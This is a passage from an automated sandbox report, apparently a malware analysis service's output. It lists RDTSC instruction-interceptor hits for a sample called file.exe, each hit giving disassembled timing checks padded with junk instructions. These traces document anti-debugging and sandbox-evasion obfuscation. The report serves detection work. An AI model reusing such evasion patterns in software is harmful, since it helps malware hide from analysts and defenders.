0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E2EAF second address: 2E2EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11D6 second address: 2E11DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11DB second address: 2E11E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E11E2 second address: 2E1203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0CB0C50343h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3DD3 second address: 2E3DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0CB0E1B256h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3DDD second address: 2E3E75 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0CB0C50343h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0CB0C50338h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2519h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F0CB0C50338h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D22ADh], ebx 0x00000055 mov dword ptr [ebp+122D36F0h], esi 0x0000005b push 00000000h 0x0000005d mov edi, ecx 0x0000005f xchg eax, esi 0x00000060 jmp 00007F0CB0C50343h 0x00000065 push eax 0x00000066 pushad 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4F33 second address: 2E4F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E3021 second address: 2E3025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E4F37 second address: 2E4F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32384C second address: 323851 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322D55 second address: 322D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 322D5B second address: 322D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32308E second address: 3230A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50347h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3230A9 second address: 3230B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3230B6 second address: 3230BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3231E7 second address: 3231ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32334F second address: 32336D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C5033Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007F0CB0C50336h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32336D second address: 32337E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F0CB0E1B25Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329D7C second address: 329D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0CB0C50349h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329D9F second address: 329DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DA3 second address: 329DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DA7 second address: 329DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DB8 second address: 329DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DBE second address: 329DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 329DC9 second address: 329DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328693 second address: 32869F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0CB0E1B256h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328B95 second address: 328B9F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CEA second address: 328CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CF1 second address: 328CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 328CF9 second address: 328CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D24 second address: 2D1D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F0CB0C50348h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0CB0C50336h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D38 second address: 2D1D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D3C second address: 2D1D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jg 00007F0CB0C5033Ah 0x0000000d mov di, E7BAh 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F0CB0C50338h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d nop 0x0000002e je 00007F0CB0C50340h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1D7C second address: 2D1D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F0CB0E1B256h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32902B second address: 32903B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C406 second address: 32C40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C40A second address: 32C41C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0CB0C50336h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C41C second address: 32C420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C420 second address: 32C426 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C426 second address: 32C42D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C750 second address: 32C766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0CB0C5033Ch 0x0000000c jnc 00007F0CB0C50336h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32C766 second address: 32C76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CA80 second address: 32CA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32CA86 second address: 32CA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3324CF second address: 3324EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50344h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333047 second address: 333051 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333051 second address: 333057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33338A second address: 3333AD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0CB0E1B256h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0CB0E1B25Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnp 00007F0CB0E1B256h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333C96 second address: 333CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0CB0C5033Ah 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333CA5 second address: 333CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0CB0E1B256h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F0CB0E1B25Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F0CB0E1B264h 0x0000001a jc 00007F0CB0E1B256h 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 333CE4 second address: 333CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3382F2 second address: 338308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0CB0E1B256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0CB0E1B25Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338475 second address: 33848E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50345h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33848E second address: 338494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338494 second address: 3384AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F0CB0C50336h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0CB0C50338h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3384AA second address: 3384BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B261h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3384BF second address: 3384C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 338636 second address: 33863C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3387F8 second address: 338801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1DF second address: 33D1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1E3 second address: 33D1ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0CB0C50336h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D1ED second address: 33D20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jne 00007F0CB0E1B256h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0CB0E1B25Bh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D20C second address: 33D210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D210 second address: 33D216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D216 second address: 33D21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D21C second address: 33D228 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D228 second address: 33D22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33D22C second address: 33D230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 345A1F second address: 345A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343BDD second address: 343BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0E1B25Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343BED second address: 343BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343D4B second address: 343D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 343D4F second address: 343D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34403D second address: 344042 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344042 second address: 34408B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50341h 0x00000009 pop edi 0x0000000a jmp 00007F0CB0C50346h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jmp 00007F0CB0C50346h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34408B second address: 34408F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34448A second address: 344492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344492 second address: 344496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445DA second address: 3445DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445DE second address: 3445E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445E4 second address: 3445F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007F0CB0C50336h 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3445F2 second address: 34460F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B268h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34460F second address: 344633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50346h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 344633 second address: 344637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3448C2 second address: 3448C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3448C8 second address: 3448D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458AA second address: 3458B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0CB0C50336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458B4 second address: 3458B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3458B8 second address: 3458BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34895D second address: 348962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D78 second address: 291D86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0CB0C50336h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D86 second address: 291D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D8A second address: 291D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0CB0C50338h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291D9C second address: 291DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 291DA4 second address: 291DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3B7 second address: 34C3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3BD second address: 34C3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0CB0C5033Ah 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3D1 second address: 34C3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34C3D7 second address: 34C3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35030D second address: 350311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 350311 second address: 350340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F0CB0C50353h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
